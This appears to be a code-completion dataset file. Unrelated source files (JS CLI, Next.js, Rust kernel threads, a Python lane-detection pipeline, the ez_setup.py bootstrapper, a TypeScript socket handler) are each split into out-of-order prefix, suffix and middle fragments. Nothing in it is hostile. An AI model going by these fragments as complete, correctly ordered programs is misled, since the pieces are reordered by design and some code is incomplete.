describe: 'Stats commands',
handler: async (args) => {
const usePrompt = (cmd, msg) => {
withPrompt(
() => { cmd(args); },
// eslint-disable-next-line quotes
`${msg}${!args.dryRun ? '' : `${"\n"}**DRY RUN**`}`,
);
};
switch (args.subcommand) {
case 'recalculatestats':
recalculateStatsCommand(args);
// usePrompt(
// recalculateStatsCommand,
// 'This will override all athlete stats.',
// );
break;
|
case 'ingesthistory':
usePrompt(
ingestV2Command,
'Will overwrite athlete stats and activities. Data for multi-location activities MAY BE DESTROYED.',
);
break;
case 'deleteactivity':
usePrompt(
deleteActivityCommand,
'This will delete an activity and decrement athlete stats.',
);
break;
case 'migratestats':
usePrompt(
migrateStatsCommand,
'This will transform athlete stats from v1 to v2 format.',
);
break;
default:
console.log('Invalid subcommand');
}
},
};
| |
_app.js
|
if (typeof window !== 'undefined') {
window.caughtWarns = []
const origWarn = window.console.warn
const origError = window.console.error
window.console.warn = function (...args) {
|
origWarn(...args)
}
window.console.error = function (...args) {
window.caughtWarns.push(args.join(' '))
origError(...args)
}
}
export default function MyApp({ Component, pageProps }) {
return <Component {...pageProps} />
}
|
window.caughtWarns.push(args.join(' '))
|
pooling.js
|
#!/usr/bin/env node
const Sema = require('async-sema')
const redis = require('promise-redis')
async function
|
() {
const red = new Sema(3, { initFn: () => redis().createClient(process.env.REDIS_URL) })
const db = await red.acquire()
console.log(await db.get('id'))
red.release(db)
const dbs = await red.drain()
dbs.map((db) => db.quit())
}
f().catch((e) => console.log(e)).then(() => console.log('READY'))
|
f
|
thread.rs
|
// Copyright 2016 Phillip Oppermann, Calvin Lee and JJ Garzella.
// See the README.md file at the top-level directory of this
// distribution.
//
// Licensed under the MIT license <LICENSE or
// http://opensource.org/licenses/MIT>, at your option.
// This file may not be copied, modified, or distributed
// except according to those terms.
use interrupts::{Context, EXIT_INT};
use memory::{alloc_stack, Stack};
use core::sync::atomic::{AtomicUsize, Ordering, ATOMIC_USIZE_INIT};
use core::mem;
/// The `id` of the next thread to be created
static ID: AtomicUsize = ATOMIC_USIZE_INIT;
/// The basic number of "ticks" each program gets to run
pub const TICKS: u8 = 10;
extern "C" {
static kstack_late_bottom: usize;
static kstack_top: usize;
}
pub enum State {
Running,
Ready,
Sleeping,
}
pub struct KThread {
pub id: usize,
stack: Stack,
// Ready => Some(_), _ => None
// XXX should this be a &'static _ or *const _ ? The former is wrong but
// works and the latter is cumbersome but more explicit.
// This is the top of the kernel stack when the thread is queued, and
    // `None` when it is running.
context: Option<&'static Context>,
pub quanta: u8,
pub state: State,
}
impl KThread {
/// Create a new thread with the given start point
///
/// # Side effects
/// Allocates a global stack for the given thread
pub fn new(start: extern "C" fn()) -> Result<KThread, &'static str> {
// for now create a 1-page stack
let stack = alloc_stack(1)?;
// now we must put the things we need on the stack.
// In the meanwhile, grab an unbounded lifetime to our context
let context = unsafe {
// if the function ever returns, make it go to the thread exit point
let mut stack_pointer = stack.top();
stack_pointer -= mem::size_of::<extern "C" fn() -> !>();
*(stack_pointer as *mut extern "C" fn() -> !) = exit;
|
let context = (context_pointer as *mut Context).as_mut().unwrap();
context.regs.zero();
context.stack_frame.instruction_pointer = start as usize;
// TODO remove magic numbers, kernel code segment
context.stack_frame.code_segment = 0b1000;
// TODO remove magic numbers, Interrupts enabled | reserved
context.stack_frame.cpu_flags = 0x202;
context.stack_frame.stack_pointer = stack_pointer;
context.stack_frame.stack_segment = 0;
}
(context_pointer as *const Context).as_ref().unwrap()
};
Ok(KThread {
id: ID.fetch_add(1, Ordering::Relaxed),
stack: stack,
context: Some(context),
quanta: TICKS,
state: State::Ready,
})
}
/// Return the current "main" thread.
///
/// # Safety
/// This function may only be called once on the main thread
pub unsafe fn main() -> KThread {
assert_has_not_been_called!("The main kthread can be created only once!");
let top = &kstack_late_bottom as *const _ as usize;
let bottom = &kstack_top as *const _ as usize;
KThread {
id: ID.fetch_add(1, Ordering::Relaxed),
stack: Stack::new(bottom, top),
context: None, /* current thread */
quanta: TICKS,
state: State::Running,
}
}
/// Return the "idle" thread
///
/// # Safety
/// Only call once
///
/// # Side effects
/// Allocates a global stack
pub unsafe fn idle() -> KThread {
assert_has_not_been_called!("The idle kthread can be created only once!");
Self::new(idle).unwrap()
}
/// Put `context` into the given thread and return the context
/// from the other thread. This should be used to swap threads.
pub fn swap(&mut self, context: &'static Context, other: &mut KThread)
-> &'static Context
{
assert!(self.context.is_none());
self.context = Some(context);
self.state = State::Ready;
// give `other` the default time slice
other.state = State::Running;
other.quanta = TICKS;
other.context.take().unwrap()
}
}
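// Spawn sketch (assumption: scheduler integration lives elsewhere):
//
//     extern "C" fn worker() { /* ... */ }
//     let thread = KThread::new(worker).expect("stack allocation failed");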
extern "C" fn idle() {
loop {
unsafe { asm!("hlt") };
}
}
pub extern "C" fn exit() -> ! {
unsafe { asm!("int $0" :: "i"(EXIT_INT) :: "volatile") };
unreachable!();
}
|
// Now we put on a fake interrupt context for returning to the thread
let context_pointer = stack_pointer - mem::size_of::<Context>();
{
|
video_pipeline.py
|
import numpy as np
import pickle
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from moviepy.editor import VideoFileClip
from image_thresholding import *
from plotting_helpers import *
from line_fit import *
from Line import *
# *** PIPELINE ***
def pipeline(img):
global error_im, skipped_frames
    # 1. Correct distortion
    # open distortion matrix
try:
saved_dist = pickle.load(open('calibrate_camera.p', 'rb'), encoding='latin1')
mtx = saved_dist['mtx']
dist = saved_dist['dist']
    except (OSError, IOError):  # no saved calibration data available yet
        print("No saved distortion data. Run camera_calibration.py")
# apply correction
undist = cv2.undistort(img, mtx, dist, None, mtx)
# 2. Apply filters to get binary map
ksize = 3
gradx = abs_sobel_thresh(undist, orient='x', sobel_kernel=ksize, thresh=(10, 100))
grady = abs_sobel_thresh(undist, orient='y', sobel_kernel=ksize, thresh=(5, 100))
mag_bin = mag_thresh(undist, sobel_kernel=ksize, mag_thresh=(10, 200))
dir_bin = dir_threshold(undist, sobel_kernel=15, thresh=(0.9, 1.2))
hls_bin = hls_select(img, thresh=(50, 255))
white_bin = white_select(img, thresh=195)
yellow_bin = yellow_select(img)
# combine filters to a final output
combined = np.zeros_like(dir_bin)
combined[((mag_bin == 1) & (dir_bin == 1) & (hls_bin == 1)) |
((white_bin == 1) | (yellow_bin == 1))] = 1
# 3. Define trapezoid points on the road and transform perspective
X = combined.shape[1]
Y = combined.shape[0]
src = np.float32(
[[205, 720],
[1075, 720],
[700, 460],
[580, 460]])
dst = np.float32(
[[300, 720],
[980, 720],
[980, 0],
[300, 0]])
# get perspective transformation matrix
|
warped = cv2.warpPerspective(combined, M, (X,Y), flags=cv2.INTER_LINEAR)
    # 4. Get polynomial fit of lines
# if > 4 frames skipped (or first frame, as skipped_frames is initialized to 100) do full search
if skipped_frames > 5:
fit_method = "Boxes"
leftx, lefty, rightx, righty, out_img = find_lane_pixels(warped)
else:
fit_method = "Around fit"
leftx, lefty, rightx, righty, out_img = find_lane_around_fit(warped, left_lane.fit_x, right_lane.fit_x)
# fit polynomials and sanity check
try:
left_fit, right_fit, left_px, right_px, ploty = fit(leftx, lefty, rightx, righty, warped.shape[0])
detected, err_msg = sanity_chk(ploty, left_px, right_px)
    except Exception:  # polynomial fit failed or returned empty data
detected, err_msg = False, "Empty data"
if detected: skipped_frames = 0
else: skipped_frames += 1
# 5. Calculate distance to center, curvature, and update Line objects
if detected or (fit_method == "Boxes" and err_msg != "Empty data"):
left_curv, right_curv = find_curv(ploty, left_fit, right_fit)
left_lane.update(ploty, left_fit, left_px, left_curv)
right_lane.update(ploty, right_fit, right_px, right_curv)
lane_w = (right_lane.base_pos - left_lane.base_pos) * 3.7/700
offset = (((right_lane.base_pos + left_lane.base_pos) - img.shape[1]) / 2) * 3.7/700
# 6. Plot fitted lanes into original image
# Create an image to draw the lines on
warp_zero = np.zeros_like(warped).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([left_lane.fit_x, left_lane.fit_y]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_lane.fit_x, right_lane.fit_y])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)
# if error save original img to check closely in image pipeline
if 1 < skipped_frames < 3:
mpimg.imsave(err_msg + "_" + str(error_im) + ".jpg", img)
error_im += 1
# Add text
road_curv = (left_lane.curv_avg + right_lane.curv_avg) // 2
if road_curv > 2000:
road_curv_text = "Road curvature: straight"
else:
road_curv_text = "Road curvature: " + str(road_curv) + "m"
side = {True: "left", False: "right"}
offset_txt = "Car is {0:.2f}m {1:s} of center".format(offset, side[offset > 0])
for i, txt in enumerate([road_curv_text, offset_txt]):
cv2.putText(result, txt, (75, 75 * (i+1)), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), 3)
# Uncomment for debugging messages
# lane_width_txt = "Lane width: %.2f m" % lane_w
# for i, obj, txt in [(1, left_lane, "Left"), (2, right_lane, "Right")]:
# if obj.curv_avg > 2000:
# curv_txt = txt + " curvature: straight"
# else:
# curv_txt = txt + " curvature: " + str(int(obj.curv_avg)) + "m"
# cv2.putText(result,curv_txt, (550, 50 * i), cv2.FONT_HERSHEY_SIMPLEX, 1, 0, 2)
# cv2.putText(result, "Skipped frames: " + str(skipped_frames), (550,150), cv2.FONT_HERSHEY_SIMPLEX, 1, 0, 2)
# cv2.putText(result, fit_method, (550, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, 0, 2)
# if err_msg != "":
# cv2.putText(result, "Error!: " + err_msg, (550, 250), cv2.FONT_HERSHEY_SIMPLEX, 1, 0, 2)
return result
# *** MAIN ***
# define global variables to use in the pipeline
left_lane = Line()
right_lane = Line()
error_im = 1
skipped_frames = 100
# load video
clip_name = "challenge_video"
clip1 = VideoFileClip(clip_name + ".mp4")#.subclip(0, 8)
# run video through the pipeline and save output
out_clip = clip1.fl_image(pipeline)
out_clip.write_videofile("output_videos/" + clip_name + "_output.mp4", audio=False)
|
M = cv2.getPerspectiveTransform(src, dst)
Minv = cv2.getPerspectiveTransform(dst, src)
# warp the result of binary thresholds
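# The gradient/color helpers called in the pipeline (abs_sobel_thresh, mag_thresh,
# dir_threshold, hls_select, ...) are defined elsewhere in the project. As a point
# of reference, a minimal sketch of what abs_sobel_thresh is assumed to do
# (illustrative only, not the project's actual implementation):
def abs_sobel_thresh_sketch(img, orient='x', sobel_kernel=3, thresh=(0, 255)):
    gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
    # take the derivative along the requested axis
    dx, dy = (1, 0) if orient == 'x' else (0, 1)
    sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, dx, dy, ksize=sobel_kernel))
    # scale to 8-bit and apply the binary threshold
    scaled = np.uint8(255 * sobel / np.max(sobel))
    binary = np.zeros_like(scaled)
    binary[(scaled >= thresh[0]) & (scaled <= thresh[1])] = 1
    return binary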
|
ez_setup.py
|
#!/usr/bin/env python
"""
Setuptools bootstrapping installer.
Run this script to install or upgrade setuptools.
"""
import os
import shutil
import sys
import tempfile
import zipfile
import optparse
import subprocess
import platform
import textwrap
import contextlib
import warnings
from distutils import log
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
try:
from site import USER_SITE
except ImportError:
USER_SITE = None
DEFAULT_VERSION = "18.5"
DEFAULT_URL = "https://pypi.python.org/packages/source/s/setuptools/"
DEFAULT_SAVE_DIR = os.curdir
def _python_cmd(*args):
"""
Execute a command.
Return True if the command succeeded.
"""
args = (sys.executable,) + args
return subprocess.call(args) == 0
def _install(archive_filename, install_args=()):
"""Install Setuptools."""
with archive_context(archive_filename):
# installing
log.warn('Installing Setuptools')
if not _python_cmd('setup.py', 'install', *install_args):
log.warn('Something went wrong during the installation.')
log.warn('See the error message above.')
# exitcode will be 2
return 2
def _build_egg(egg, archive_filename, to_dir):
"""Build Setuptools egg."""
with archive_context(archive_filename):
# building an egg
log.warn('Building a Setuptools egg in %s', to_dir)
_python_cmd('setup.py', '-q', 'bdist_egg', '--dist-dir', to_dir)
# returning the result
log.warn(egg)
if not os.path.exists(egg):
raise IOError('Could not build the egg.')
class ContextualZipFile(zipfile.ZipFile):
"""Supplement ZipFile class to support context manager for Python 2.6."""
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __new__(cls, *args, **kwargs):
"""Construct a ZipFile or ContextualZipFile as appropriate."""
if hasattr(zipfile.ZipFile, '__exit__'):
return zipfile.ZipFile(*args, **kwargs)
return super(ContextualZipFile, cls).__new__(cls)
@contextlib.contextmanager
def archive_context(filename):
"""
Unzip filename to a temporary directory, set to the cwd.
The unzipped target is cleaned up after.
"""
tmpdir = tempfile.mkdtemp()
log.warn('Extracting in %s', tmpdir)
old_wd = os.getcwd()
try:
os.chdir(tmpdir)
with ContextualZipFile(filename) as archive:
archive.extractall()
# going in the directory
subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
os.chdir(subdir)
log.warn('Now working in %s', subdir)
yield
finally:
os.chdir(old_wd)
shutil.rmtree(tmpdir)
|
def _do_download(version, download_base, to_dir, download_delay):
"""Download Setuptools."""
egg = os.path.join(to_dir, 'setuptools-%s-py%d.%d.egg'
% (version, sys.version_info[0], sys.version_info[1]))
if not os.path.exists(egg):
archive = download_setuptools(version, download_base,
to_dir, download_delay)
_build_egg(egg, archive, to_dir)
sys.path.insert(0, egg)
# Remove previously-imported pkg_resources if present (see
# https://bitbucket.org/pypa/setuptools/pull-request/7/ for details).
if 'pkg_resources' in sys.modules:
del sys.modules['pkg_resources']
import setuptools
setuptools.bootstrap_install_from = egg
def use_setuptools(
version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=DEFAULT_SAVE_DIR, download_delay=15):
"""
Ensure that a setuptools version is installed.
Return None. Raise SystemExit if the requested version
or later cannot be installed.
"""
to_dir = os.path.abspath(to_dir)
# prior to importing, capture the module state for
# representative modules.
rep_modules = 'pkg_resources', 'setuptools'
imported = set(sys.modules).intersection(rep_modules)
try:
import pkg_resources
pkg_resources.require("setuptools>=" + version)
# a suitable version is already installed
return
except ImportError:
# pkg_resources not available; setuptools is not installed; download
pass
except pkg_resources.DistributionNotFound:
# no version of setuptools was found; allow download
pass
except pkg_resources.VersionConflict as VC_err:
if imported:
_conflict_bail(VC_err, version)
# otherwise, unload pkg_resources to allow the downloaded version to
# take precedence.
del pkg_resources
_unload_pkg_resources()
return _do_download(version, download_base, to_dir, download_delay)
def _conflict_bail(VC_err, version):
"""
Setuptools was imported prior to invocation, so it is
unsafe to unload it. Bail out.
"""
conflict_tmpl = textwrap.dedent("""
The required version of setuptools (>={version}) is not available,
and can't be installed while this script is running. Please
install a more recent version first, using
'easy_install -U setuptools'.
(Currently using {VC_err.args[0]!r})
""")
msg = conflict_tmpl.format(**locals())
sys.stderr.write(msg)
sys.exit(2)
def _unload_pkg_resources():
del_modules = [
name for name in sys.modules
if name.startswith('pkg_resources')
]
for mod_name in del_modules:
del sys.modules[mod_name]
def _clean_check(cmd, target):
"""
Run the command to download target.
If the command fails, clean up before re-raising the error.
"""
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError:
if os.access(target, os.F_OK):
os.unlink(target)
raise
def download_file_powershell(url, target):
"""
Download the file at url to target using Powershell.
Powershell will validate trust.
Raise an exception if the command cannot complete.
"""
target = os.path.abspath(target)
ps_cmd = (
"[System.Net.WebRequest]::DefaultWebProxy.Credentials = "
"[System.Net.CredentialCache]::DefaultCredentials; "
"(new-object System.Net.WebClient).DownloadFile(%(url)r, %(target)r)"
% vars()
)
cmd = [
'powershell',
'-Command',
ps_cmd,
]
_clean_check(cmd, target)
def has_powershell():
"""Determine if Powershell is available."""
if platform.system() != 'Windows':
return False
cmd = ['powershell', '-Command', 'echo test']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_powershell.viable = has_powershell
def download_file_curl(url, target):
cmd = ['curl', url, '--silent', '--output', target]
_clean_check(cmd, target)
def has_curl():
cmd = ['curl', '--version']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_curl.viable = has_curl
def download_file_wget(url, target):
cmd = ['wget', url, '--quiet', '--output-document', target]
_clean_check(cmd, target)
def has_wget():
cmd = ['wget', '--version']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_wget.viable = has_wget
def download_file_insecure(url, target):
"""Use Python to download the file, without connection authentication."""
src = urlopen(url)
try:
# Read all the data in one block.
data = src.read()
finally:
src.close()
# Write all the data in one block to avoid creating a partial file.
with open(target, "wb") as dst:
dst.write(data)
download_file_insecure.viable = lambda: True
def get_best_downloader():
downloaders = (
download_file_powershell,
download_file_curl,
download_file_wget,
download_file_insecure,
)
viable_downloaders = (dl for dl in downloaders if dl.viable())
return next(viable_downloaders, None)
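# Illustrative use of the downloader selection (assumed flow): each candidate
# advertises availability through its `viable` attribute, and the first viable
# one is used to fetch a URL to a local target, e.g.:
#
#   downloader = get_best_downloader()
#   downloader(DEFAULT_URL + "setuptools-18.5.zip", "setuptools-18.5.zip")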
def download_setuptools(
version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=DEFAULT_SAVE_DIR, delay=15,
downloader_factory=get_best_downloader):
"""
Download setuptools from a specified location and return its filename.
`version` should be a valid setuptools version number that is available
as an sdist for download under the `download_base` URL (which should end
with a '/'). `to_dir` is the directory where the egg will be downloaded.
`delay` is the number of seconds to pause before an actual download
attempt.
``downloader_factory`` should be a function taking no arguments and
returning a function for downloading a URL to a target.
"""
# making sure we use the absolute path
to_dir = os.path.abspath(to_dir)
zip_name = "setuptools-%s.zip" % version
url = download_base + zip_name
saveto = os.path.join(to_dir, zip_name)
if not os.path.exists(saveto): # Avoid repeated downloads
log.warn("Downloading %s", url)
downloader = downloader_factory()
downloader(url, saveto)
return os.path.realpath(saveto)
def _build_install_args(options):
"""
Build the arguments to 'python setup.py install' on the setuptools package.
Returns list of command line arguments.
"""
return ['--user'] if options.user_install else []
def _parse_args():
"""Parse the command line for options."""
parser = optparse.OptionParser()
parser.add_option(
'--user', dest='user_install', action='store_true', default=False,
help='install in user site package (requires Python 2.6 or later)')
parser.add_option(
'--download-base', dest='download_base', metavar="URL",
default=DEFAULT_URL,
help='alternative URL from where to download the setuptools package')
parser.add_option(
'--insecure', dest='downloader_factory', action='store_const',
const=lambda: download_file_insecure, default=get_best_downloader,
help='Use internal, non-validating downloader'
)
parser.add_option(
'--version', help="Specify which version to download",
default=DEFAULT_VERSION,
)
parser.add_option(
'--to-dir',
help="Directory to save (and re-use) package",
default=DEFAULT_SAVE_DIR,
)
options, args = parser.parse_args()
# positional arguments are ignored
return options
def _download_args(options):
"""Return args for download_setuptools function from cmdline args."""
return dict(
version=options.version,
download_base=options.download_base,
downloader_factory=options.downloader_factory,
to_dir=options.to_dir,
)
def main():
"""Install or upgrade setuptools and EasyInstall."""
options = _parse_args()
archive = download_setuptools(**_download_args(options))
return _install(archive, _build_install_args(options))
if __name__ == '__main__':
sys.exit(main())
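# Typical invocations (illustrative; the flags are defined in _parse_args above):
#   python ez_setup.py                 # bootstrap with the best available downloader
#   python ez_setup.py --user          # install into the user site-packages
#   python ez_setup.py --insecure      # force the built-in non-validating downloader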
| |
_1758_minimum_changes_to_make_alternating_binary_string.rs
|
struct Solution;
impl Solution {
fn min_operations(s: String) -> i32 {
let mut odd = [0, 0];
let mut even = [0, 0];
let s: Vec<char> = s.chars().collect();
let n = s.len();
for i in 0..n {
if i % 2 == 0 {
if s[i] == '0' {
even[0] += 1;
} else {
even[1] += 1;
}
} else {
if s[i] == '0' {
odd[0] += 1;
} else {
odd[1] += 1;
}
}
}
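        // `a` is the edit count against the alternating pattern "0101...":
        // even indices should be '0' and odd indices '1'. Because
        // even[0] + even[1] == ceil(n / 2) and odd[0] + odd[1] == floor(n / 2),
        // the absolute differences below reduce to even[1] + odd[0]; `b` is the
        // symmetric count for the pattern "1010...".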
let a = (even[0] - (n + 1) as i32 / 2).abs() + (odd[1] - n as i32 / 2).abs();
let b = (odd[0] - n as i32 / 2).abs() + (even[1] - (n + 1) as i32 / 2).abs();
a.min(b)
}
}
#[test]
fn test()
|
{
let s = "0100".to_string();
let res = 1;
assert_eq!(Solution::min_operations(s), res);
let s = "10".to_string();
let res = 0;
assert_eq!(Solution::min_operations(s), res);
let s = "1111".to_string();
let res = 2;
assert_eq!(Solution::min_operations(s), res);
}
|
|
SocketDeviceHandler.ts
|
import * as socketIO from "socket.io";
import {
Device,
GlobalAudioProducer,
GlobalVideoProducer,
SoundCard,
SoundCardId,
Track,
TrackId,
TrackPreset,
TrackPresetId,
User
} from "../model.server";
import {ObjectId} from "mongodb";
import {serverAddress} from "../index";
import {ClientDeviceEvents, ServerDeviceEvents} from "../events";
import * as pino from "pino";
import {omit} from "lodash";
import {MongoRealtimeDatabase} from "../database/MongoRealtimeDatabase";
import {
AddAudioProducerPayload, AddSoundCardPayload, AddTrackPayload, AddTrackPresetPayload,
AddVideoProducerPayload, ChangeSoundCardPayload, ChangeTrackPayload, ChangeTrackPresetPayload,
RemoveAudioProducerPayload, RemoveSoundCardPayload, RemoveTrackPayload, RemoveTrackPresetPayload,
RemoveVideoProducerPayload
} from "../payloads";
const logger = pino({
level: process.env.LOG_LEVEL || 'info'
});
export class SocketDeviceHandler {
private readonly serverAddress: string;
private readonly database: MongoRealtimeDatabase;
private readonly user: User;
private readonly socket: socketIO.Socket;
private device: Device;
constructor(serverAddress: string, database: MongoRealtimeDatabase, user: User, socket: socketIO.Socket) {
this.serverAddress = serverAddress;
this.user = user;
this.database = database;
this.socket = socket;
}
init() {
this.socket.on(ClientDeviceEvents.UPDATE_DEVICE, (payload: Partial<Device>) => {
if (!payload._id)
return;
return this.database.updateDevice(this.user._id, payload._id, omit(payload, '_id'));
});
this.socket.on(ClientDeviceEvents.ADD_AUDIO_PRODUCER, (
payload: AddAudioProducerPayload, fn: (error: string | null, producer?: GlobalAudioProducer) => void
) => {
const routerId = new ObjectId(payload.routerId);
// Get current stage id
return this.database.createAudioProducer({
routerId: routerId,
routerProducerId: payload.routerProducerId,
deviceId: this.device._id,
userId: this.user._id,
})
.then(producer => fn(null, producer))
.catch(error => fn(error.message))
});
this.socket.on(ClientDeviceEvents.REMOVE_AUDIO_PRODUCER, (payload: RemoveAudioProducerPayload, fn: (error?: string) => void) => {
const id = new ObjectId(payload);
return this.database.deleteAudioProducer(this.user._id, id)
.then(() => {
fn()
})
.catch(error => {
logger.error(error);
fn(error.message);
})
}
);
this.socket.on(ClientDeviceEvents.ADD_VIDEO_PRODUCER, (
payload: AddVideoProducerPayload, fn: (error: string | null, producer?: GlobalVideoProducer) => void
) => {
// Get current stage id
logger.debug("[SOCKET DEVICE HANDLER] ADD VIDEO PRODUCER " + payload.routerId);
const routerId = new ObjectId(payload.routerId);
return this.database.createVideoProducer({
routerId: routerId,
routerProducerId: payload.routerProducerId,
deviceId: this.device._id,
userId: this.user._id,
})
.then(producer => fn(null, producer))
.catch(error => fn(error.message))
});
this.socket.on(ClientDeviceEvents.REMOVE_VIDEO_PRODUCER, (payload: RemoveVideoProducerPayload, fn: (error?: string) => void) => {
const id = new ObjectId(payload);
logger.debug("[SOCKET DEVICE HANDLER] REMOVE VIDEO PRODUCER " + payload);
return this.database.deleteVideoProducer(this.user._id, id)
.then(() => {
fn()
})
.catch(error => {
logger.error(error);
fn(error.message);
})
}
);
this.socket.on(ClientDeviceEvents.ADD_SOUND_CARD, (payload: AddSoundCardPayload, fn: (soundCard: SoundCard) => void) =>
//TODO: Validate data
this.database.createSoundCard({
name: "",
numInputChannels: 0,
numOutputChannels: 0,
sampleRate: 48000,
periodSize: 96,
numPeriods: 2,
driver: "JACK",
...payload.initial,
trackPresetId: payload.initial.trackPresetId ? new ObjectId(payload.initial.trackPresetId) : undefined,
userId: this.user._id
})
.then(soundCard => fn(soundCard)));
this.socket.on(ClientDeviceEvents.CHANGE_SOUND_CARD, (payload: ChangeSoundCardPayload, fn: (soundCard: Partial<SoundCard>) => void) => {
const id = new ObjectId(payload.id);
const trackPresetId = payload.update.trackPresetId ? new ObjectId(payload.update.trackPresetId) : undefined;
this.database.updateSoundCard(this.device._id, id, {
...payload.update,
trackPresetId: trackPresetId
})
.then(() => fn({
...payload.update,
trackPresetId: trackPresetId,
_id: id
}))
});
this.socket.on(ClientDeviceEvents.REMOVE_SOUND_CARD, (id: RemoveSoundCardPayload, fn: () => void) =>
this.database.deleteSoundCard(this.device._id, new ObjectId(id))
.then(() => fn())
);
this.socket.on(ClientDeviceEvents.ADD_TRACK_PRESET, (payload: AddTrackPresetPayload, fn: (trackPreset: TrackPreset) => void) => {
const soundCardId = new ObjectId(payload.initial.soundCardId);
return this.database.createTrackPreset({
name: "",
outputChannels: [],
...payload.initial,
soundCardId: soundCardId,
userId: this.user._id
})
.then(trackPreset => fn(trackPreset));
});
this.socket.on(ClientDeviceEvents.CHANGE_TRACK_PRESET, (payload: ChangeTrackPresetPayload, fn: (trackPreset: Partial<TrackPreset>) => void) => {
const id = new ObjectId(payload.id);
return this.database.updateTrackPreset(this.device._id, id, payload.update)
.then(() => fn({
...payload.update,
_id: id
}));
});
this.socket.on(ClientDeviceEvents.REMOVE_TRACK_PRESET, (id: RemoveTrackPresetPayload, fn: () => void) =>
this.database.deleteTrackPreset(this.device._id, new ObjectId(id))
.then(() => fn())
|
);
this.socket.on(ClientDeviceEvents.ADD_TRACK, (payload: AddTrackPayload, fn: (track: Track) => void) => {
if (payload.initial.trackPresetId) {
const trackPresetId = new ObjectId(payload.initial.trackPresetId);
return this.database.createTrack({
channel: payload.initial.channel || 0,
gain: payload.initial.gain || 0,
volume: payload.initial.volume || 1,
directivity: payload.initial.directivity || "omni",
trackPresetId: trackPresetId,
online: true,
userId: this.user._id,
})
.then(track => fn(track));
}
});
this.socket.on(ClientDeviceEvents.CHANGE_TRACK, (payload: ChangeTrackPayload, fn: (track: Partial<Track>) => void) => {
const id = new ObjectId(payload.id);
return this.database.updateTrack(this.device._id, id, payload.update)
.then(() => fn({
...payload.update,
_id: id
}))
});
this.socket.on(ClientDeviceEvents.REMOVE_TRACK, (id: RemoveTrackPayload, fn: () => void) =>
this.database.deleteTrack(this.device._id, new ObjectId(id))
.then(() => fn())
);
this.socket.on("disconnect", async () => {
if (this.device && !this.device.mac) {
logger.debug("Removed device '" + this.device.name + "' of " + this.user.name);
return this.database.deleteDevice(this.device._id)
.then(() => this.database.renewOnlineStatus(this.user._id));
} else {
logger.debug("Switched device '" + this.device.name + "' of " + this.user.name + " to offline");
return this.database.updateDevice(this.user._id, this.device._id, {online: false})
.then(() => this.database.renewOnlineStatus(this.user._id));
}
/*if (this.user.stageMemberId) {
if (await DeviceModel.count({userId: this.user._id, online: true}) === 0) {
return StageMemberModel.findByIdAndUpdate(this.user.stageMemberId, {online: false}).exec();
}
}*/
});
logger.debug("[SOCKET DEVICE HANDLER] Registered handler for user " + this.user.name + " at socket " + this.socket.id);
}
async generateDevice(): Promise<Device> {
logger.debug("Generating device for user " + this.user.name + "...");
let initialDevice: Device;
if (this.socket.handshake.query && this.socket.handshake.query.device) {
initialDevice = JSON.parse(this.socket.handshake.query.device);
if (initialDevice.mac) {
// Try to get device by mac
this.device = await this.database.readDeviceByUserAndMac(this.user._id, initialDevice.mac);
if (this.device) {
this.device.online = true;
return this.database.updateDevice(this.user._id, this.device._id, {online: true})
.then(() => this.device);
}
}
}
// We have to create the device
const device: Omit<Device, "_id"> = {
canVideo: false,
canAudio: false,
sendAudio: false,
sendVideo: false,
receiveAudio: false,
receiveVideo: false,
name: "",
...initialDevice,
soundCardIds: [],
server: serverAddress,
userId: this.user._id,
online: true
};
this.device = await this.database.createDevice(device);
// In addition notify user (not in the socket group yet)
this.database.sendToDevice(this.socket, ServerDeviceEvents.LOCAL_DEVICE_READY, this.device);
logger.debug("Finished generating device for user " + this.user.name + " by creating new.");
return this.device;
}
public sendRemoteDevices(): Promise<void> {
// Send other devices
return this.database.readDevicesByUser(this.user._id)
.then(remoteDevices =>
remoteDevices.forEach(remoteDevice => {
if (remoteDevice._id.toString() !== this.device._id.toString()) {
logger.debug("Sent remote device " + remoteDevice._id + " to device " + this.device.name + " of " + this.user.name + "!");
return this.database.sendToDevice(this.socket, ServerDeviceEvents.DEVICE_ADDED, remoteDevice);
}
})
);
}
}
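// Minimal usage sketch (assumed wiring, not part of this module): on each new
// socket connection, construct a handler, register its listeners, create or
// restore the device, then push the user's other devices to the socket.
//
//   io.on("connection", async (socket: socketIO.Socket) => {
//     const handler = new SocketDeviceHandler(serverAddress, database, user, socket);
//     handler.init();
//     await handler.generateDevice();
//     await handler.sendRemoteDevices();
//   });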
| |
configure.go
|
/*
Copyright © 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package aid
import (
"bufio"
"encoding/json"
"fmt"
"io/ioutil"
